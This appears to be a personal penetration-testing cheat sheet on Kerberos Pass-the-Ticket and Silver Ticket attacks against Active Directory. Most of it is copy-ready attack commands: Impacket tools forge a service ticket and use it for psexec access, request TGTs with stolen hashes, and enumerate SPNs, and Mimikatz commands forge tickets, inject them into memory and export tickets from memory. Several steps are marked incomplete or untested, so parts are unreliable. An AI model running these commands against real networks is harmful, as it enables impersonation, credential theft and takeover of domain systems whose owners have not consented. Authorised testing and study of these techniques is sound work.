Pass the Ticket

TGT can only be used on the machine it was created for. TGS allows more flexibility than Overpass the Hash as it can be exported/re-injected elsewhere on the network and used to authenticate to a specific service.

Pass-the-Ticket (PtT) involves grabbing an existing Kerberos ticket and using it to impersonate a user. Mimikatz supports gathering either the current user’s Kerberos tickets, or all Kerberos tickets for every user authenticated to the system (if Kerberos unconstrained delegation is configured, this could be a big deal). Once the Kerberos ticket(s) are acquired, they can be passed using Mimikatz and used to access resources (within the Kerberos ticket lifetime).

Prerequisites
On Kali
On Windows

💡 Can use crackmapexec with ccache file (KRB5CCNAME).

Prerequisites

  • Requires access to the admin share “Admin$”, which requires local administrative rights on the target machine.
  • Password hash of the service account (IIS, SQL Server, etc.). Use Kerberoasting first?

On Kali

❗ TO COMPLETE

Get TGS

💡 See Impacket-Ticketer. Get domain SID with Enum4Linux.

The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of service is owned (like the PC account hash). Thus, it is possible to gain access to that service by forging a custom TGS as any user. See HackTricks.

Optional – Get Domain SID

powershell Get-ADDomain

Use enum4linux, domain SID will be near the top. No need for a full report, so limit output with -P (for password policy only).

enum4linux -P -u $USER -p $PASS $IP

Optional – Get SPN

impacket-GetUserSPNs -dc-ip $DC_IP ${DOMAIN}/${USER}:${PASS} -outputfile SPNs.txt

Generate Silver Ticket

NTLM=<NTLM hash>
DOMAIN_SID="S-1-5-21-1339291983-1349129144-367733775"
DOMAIN=example.com
SPN=example/CIFS:445
impacket-ticketer -nthash $NTLM -domain-sid $DOMAIN_SID -domain $DOMAIN -spn $SPN baduser

Use Silver Ticket

export KRB5CCNAME=baduser.ccache 
impacket-psexec ${DOMAIN}/baduser@machine.${DOMAIN} -k -no-pass

Get Kerberos TGT tickets

❗ NOT SURE IF THIS STEP IS NEEDED

IP=x.x.x.x
DC_IP=y.y.y.y
HASH=abc...def
USER=myuser
DOMAIN=example.com
PASS=MyPassword
impacket-getTGT -dc-ip $DC_IP ${DOMAIN}/${USER}:${PASS}

Can also pass the hash to get it 😉

impacket-getTGT -dc-ip $DC_IP -hashes :${HASH} ${DOMAIN}/${USER}

On Windows

Get Domain name

systeminfo | findstr /B /C:"Domain"

Get SID of current user

Example: S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-YYYY, domain SID is S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX, user RID is YYYY.

❗ Need to be logged as domain user or the SID will be wrong. Use “rdesktop -d $DOMAIN”!!!

whoami /user

Generate the RC4 hash from password

A silver ticket, requires the password hash and NOT the cleartext password.

mimikatz.exe
kerberos::hash /password:MyPassword

Generate a silver ticket for a service (like IIS, SQL Server, etc.)

Also see Mimikatz. The command says “golden” but it is a silver ticket. /ptt will load the ticket in memory.

mimikatz.exe
privilege::debug
kerberos::purge
kerberos::list
kerberos::golden /user:fakeuser /domain:example.com /sid:S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx /target:<domain from SPN> /service:HTTP /rc4:<password RC4 hash> /ptt
kerberos::list

A new service ticket for the SPN has been loaded into memory and contains appropriate group membership permissions. The service application will see the current user as both the built-in local administrator (User Id: 500) and a member of several highly-privileged groups (Groups Id) like the Domain Admins group.

Export the ticket if you want to use it in Kali.

Copy the file to Kali after the export.

kerberos::list /export

Convert from Mimikatz format to ccache (used by Impacket) format.

impacket-ticketConverter $TICKET_KIRBY $TICKET_CCACHE

Not tested

mimikatz.exe
SEKURLSA::tickets /export

Transfer the generated files to Kali.

impacket-ticketConverter ticket.kirbi ticket.ccache